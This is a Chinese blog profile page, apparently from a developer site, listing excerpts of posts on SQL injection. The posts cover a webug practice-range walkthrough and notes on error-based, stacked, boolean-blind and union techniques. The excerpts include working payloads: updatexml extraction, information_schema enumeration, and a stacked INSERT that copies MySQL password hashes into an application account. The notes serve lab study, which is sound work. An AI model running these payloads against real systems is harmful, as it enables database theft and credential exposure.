- 博客(6)
- 收藏
- 关注
原创 webug靶场通关(1-5)
一个全新的界面,尝试点了其他的链接都打不开,发现一个搜索框,随便输入一些,页面都正常,当输入单引号时,页面报错。这道题的延时盲注步骤和第二关是一样的,就不多做赘述了,将拼接的sql语句附上,其中的表名,字段名自行替换。尝试单双引号的测试,有页面不正常的,看来也是可以用到布尔盲注的,我尝试了一下,布尔盲注也是也可以的。单双引号测试,单引号报错,使用单引号闭合,order by 2时正常,3不正常,所以是2个字段。仔细看和第一关的flag一样,看来得在其他表中找了,步骤是一样的,不过多赘述了。
2023-11-19 21:54:37
155
原创 sql报错注入
1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆库。1' and updatexml(1,concat(0x7e,(select version()),0x7e),1)--+ 爆版本。1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆用户。函数 updatexml(xml_doument,XPath_string,new_value)
2023-11-05 21:05:51
45
1
原创 sql堆叠注入
insert into users(id,username,password)values(1001,(select authentication_string from mysql.user limit 1),'123456')--+ 添加用户,将mysql的登陆密码写入用户1001的密码中,在经过查询得到密码。知道表的列的情况下使用 insert into 插入语句进行增加账号。自己给自己设置一个用户 删除原来的用户 先给设置的用户一个所有的权限 然后再删除 然后再登录试试。
2023-11-05 21:05:16
25
1
原创 sql布尔盲注
1' and if(substring((select group_concat(table_name) from information_schema.tables where table_schema =database()),1,1)="g",1,0)# 爆表。SUBSTRING substring(str,i,n)字符串截取,第一个参数是字符串,第二个参数是开始截取位置,第三个是截取的长度。盲注入的方式有两种:一种是布尔型盲注入,另外一种是延时注入。盲注判断是否存在注入。
2023-11-05 21:03:46
32
原创 sql联合注入
1' union select 1,database(),group_concat(column_name),4 from information_schema.columns where table_name='fl4g'# 爆字段。-1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()# 爆表。
2023-11-05 21:02:59
29
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人